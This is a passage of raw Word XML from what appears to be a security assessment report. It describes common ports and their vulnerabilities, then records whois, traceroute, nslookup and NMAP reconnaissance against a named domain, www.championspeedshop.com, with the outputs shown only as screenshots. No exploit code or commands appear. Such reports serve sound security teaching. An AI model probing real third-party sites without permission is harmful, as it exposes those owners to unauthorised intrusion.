          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 8009 is used by the Apache JServ Protocol (AJP) or Tomcat AJP to communicate between Apache HTTP Server and Apache Tomcat application server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D6F09" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities: AJP vulnerabilities can include misconfigurations, remote code execution, and potential for unauthorized access if the connection is not properly secured. It is crucial to follow secure configuration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>practices, use encrypted connections, and regularly update Apache and Tomcat software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193964D8" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DE6B44" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 8180 (HTTP Alternate / JBoss Application Server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C5DD67" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 8180 is commonly used as an alternate HTTP port or by JBoss Application Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CBA01E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Vulnerabilities associated with port 8180 can include web application vulnerabilities, server misconfigurations, and potential for unauthorized access. Regularly patching the server software, securing web applications, and implementing appropriate access controls are essential to mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA87B9" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C5A278" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 23 (Telnet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F69C66" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 23 is traditionally used for Telnet, which allows remote access to servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DAE7D9" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Telnet is considered insecure due to the lack of encryption, which can expose login credentials and sensitive information to interception by attackers. It is generally recommended to use SSH instead of Telnet for secure remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD2DCD" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D2CD45" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 25 (SMTP - Simple Mail Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77198197" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 25 is used for email communication, specifically for sending email messages between mail servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D8088" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Some vulnerabilities associated with SMTP include open relay, which allows unauthorized users to send spam through the server, and the potential for email spoofing and phishing attacks. Secure configuration, spam filtering, and implementing sender authentication mechanisms (e.g., SPF, DKIM) can help mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788B2DA" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3242400B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 80 (HTTP - Hypertext Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FC096" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 80 is used for serving web pages over the internet. It is the default port for unencrypted HTTP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC051F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: Common vulnerabilities of web servers on port 80 include web application vulnerabilities (e.g., XSS, SQL injection), server misconfigurations, and potential for unauthorized access. Regularly patching web server software, implementing secure coding practices, and using web application firewalls can help address these vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D4CCE" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67884CCE" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 111 (RPC - Remote Procedure Call):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F77019" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 111 is associated with RPC, a protocol used for communication between networked systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19945330" w14:textId="45F18CFE" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities: RPC services can be vulnerable to various attacks, including buffer overflow, remote code execution, and unauthorized access. It is crucial to apply security patches, disable unnecessary RPC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>services, and use access control mechanisms to mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D05AB2" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4825B0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDAB530" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 139 (NetBIOS - Network Basic Input/Output System):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65F3FE" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use: Port 139 is associated with NetBIOS, an older protocol used for file and print sharing services in Windows networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E0CFF" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerabilities: NetBIOS services on port 139 can be vulnerable to exploits like the infamous WannaCry ransomware attack. Attackers can target weaknesses such as unpatched systems, weak passwords, and misconfigurations to gain unauthorized access or execute malicious activities. Securing Windows systems, using strong passwords, and blocking external access to port 139 can help reduce the associated risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C55758B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="658B2657" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="264AD76F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="20379285" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="0EFCBFF4" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="115C99A2" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="287E92DA" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="1AD4751D" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="639D8AB0" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="2DDE61C6" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="4759A89E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TARGET WEBSITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A69E5F" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Name: www.championspeedshop.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74168EB5" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206D9AAF" w14:textId="2023767A" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Passive Reconassaince</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D3F8D4" w14:textId="09A97376" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD9AE9" w14:textId="0C489CCC" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA"/>
    <w:p w14:paraId="612C9178" w14:textId="59AB1C30" w:rsidR="007902BA" w:rsidRDefault="00F264F7" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13F67FC7" wp14:editId="2D435292">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>386856</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43251</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4667885" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21490"/>
                <wp:lineTo x="21509" y="21490"/>
                <wp:lineTo x="21509" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1108452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7885" cy="2987040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5849C" w14:textId="30737DBA" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24C49300" wp14:editId="487635C3">
            <wp:extent cx="4984750" cy="3194050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1325565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4750" cy="3194050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D0A3E" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1CC165" w14:textId="77777777" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635DD1CB" w14:textId="77777777" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E517611" w14:textId="77777777" w:rsidR="00F264F7" w:rsidRDefault="00F264F7" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058EE7DC" w14:textId="21463AFB" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24483F0B" wp14:editId="47C9477D">
            <wp:extent cx="4356100" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1546554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6100" cy="2832100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="566195CC" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BC99C2" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool Used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663A1D5" w14:textId="672D7A85" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A74CE3" wp14:editId="489715D5">
            <wp:extent cx="2940050" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11741035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0050" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67445A0B" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Active Reconassaince</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F46F7" w14:textId="77777777" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tool Used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A924BF2" w14:textId="6EECE2E2" w:rsidR="007902BA" w:rsidRDefault="007902BA" w:rsidP="007902BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673D434E" wp14:editId="416C32FD">
            <wp:extent cx="3625850" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1533104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5850" cy="2654300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
